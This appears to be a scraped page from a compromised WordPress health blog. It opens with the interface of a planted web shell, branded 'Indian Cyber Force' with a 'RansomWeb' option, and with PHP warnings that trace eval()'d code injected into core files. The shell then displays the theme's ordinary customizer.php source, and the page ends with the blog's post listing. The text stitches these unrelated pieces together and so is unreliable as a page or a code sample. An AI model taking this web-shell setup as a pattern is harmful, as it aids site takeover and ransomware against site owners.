Warning: Constant WP_USE_THEMES already defined in css.zip#index.php on line 74
  • Home (current)
  • वर्तमान निदेशक => /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/
  • सूचना एवं अपलोड
    Info Server
Indian Cyber Force
Folders रचयन्तु सञ्चिकां रचयन्तु RansomWeb लॉगआउट

Warning: Undefined array key "बहिः गच्छतु" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 136

Warning: Undefined array key "aksi" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 140

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 159

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 181
Current File : /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/customizer.php
<?php
/**
 * Graceful Theme Customizer
 *
 * @package Graceful
 */

/*
** Register Theme Customizer
*/
function graceful_customize_register( $wp_customize ) {

	// Customizer Sanitization Functions
	require get_template_directory().'/inc/customizer/customizer-sanitization.php';

	// Theme Customizer Sections
	require get_template_directory().'/inc/customizer/theme-options/about.php';
	require get_template_directory().'/inc/customizer/theme-options/colors.php';
	require get_template_directory().'/inc/customizer/theme-options/basic-layouts.php';
	require get_template_directory().'/inc/customizer/theme-options/site-identity.php';
	require get_template_directory().'/inc/customizer/theme-options/navigation.php';
	require get_template_directory().'/inc/customizer/theme-options/post-slider.php';
	require get_template_directory().'/inc/customizer/theme-options/blogs-page.php';
	require get_template_directory().'/inc/customizer/theme-options/single-page.php';
	require get_template_directory().'/inc/customizer/theme-options/social-media.php';
	require get_template_directory().'/inc/customizer/theme-options/site-footer.php';
	require get_template_directory().'/inc/customizer/theme-options/loading-animation.php';
	
}
add_action( 'customize_register', 'graceful_customize_register' );


/*
** To preview changes instantly bind the js handlers
*/
function graceful_customize_preview_js() {
	wp_enqueue_script( 'graceful-customizer-previews', get_theme_file_uri( '/inc/customizer/customizer-ui/js/customizer-previews.js' ), array( 'customize-preview' ), '1.0', true );
}
add_action( 'customize_preview_init', 'graceful_customize_preview_js' );

/*
** Load logic dynamically for the customizers controls section.
*/
function graceful_panels_js() {
	wp_enqueue_style( 'fontawesome', get_theme_file_uri( '/assets/css/font-awesome.css' ) );
	wp_enqueue_style( 'graceful-customize-style', get_theme_file_uri( '/inc/customizer/customizer-ui/css/custom-ui.css' ) );
	wp_enqueue_script( 'graceful-customizer-controls', get_theme_file_uri( '/inc/customizer/customizer-ui/js/customizer-controls.js' ), array(), '1.0', true );
}
add_action( 'customize_controls_enqueue_scripts', 'graceful_panels_js' );

// Load default values for customizer
require get_template_directory().'/inc/customizer/customizer-default.php';
wellwisehub – Page 9 Skip to content
wellwisehub

Latest Articles

  • Blog

    Nourish Your Body One Sip at a Time: The Health Perks of Daily Smoothies

  • Blog

    Steps to Take When You’re Injured in a Car Accident

  • Blog

    Is Your Cough a Cause for Concern?

  • Blog

    Effective Ways to Handle Medical Emergencies in the Workplace

  • Blog

    5 Effective Natural Remedies to Soothe Stress Levels

  • Blog

    Key Advantages of Male Nose Surgery You Need to Be Aware Of

  • Blog

    The Essential Guide to Keeping Your Skin Hydrated

  • Blog

    Effective Strategies for Managing Chronic Conditions in Pets: Expert Guidance from PetPawsRx

  • Blog

    Master the Art of Bodybuilding: 5 Expert Tips for Achieving Success

  • Blog

    Five Powerful Habits to Ease Anxiety and Promote Calm

 Older Posts
Newer Posts 

Recent Posts

Recent Comments

Graceful Theme by Optima Themes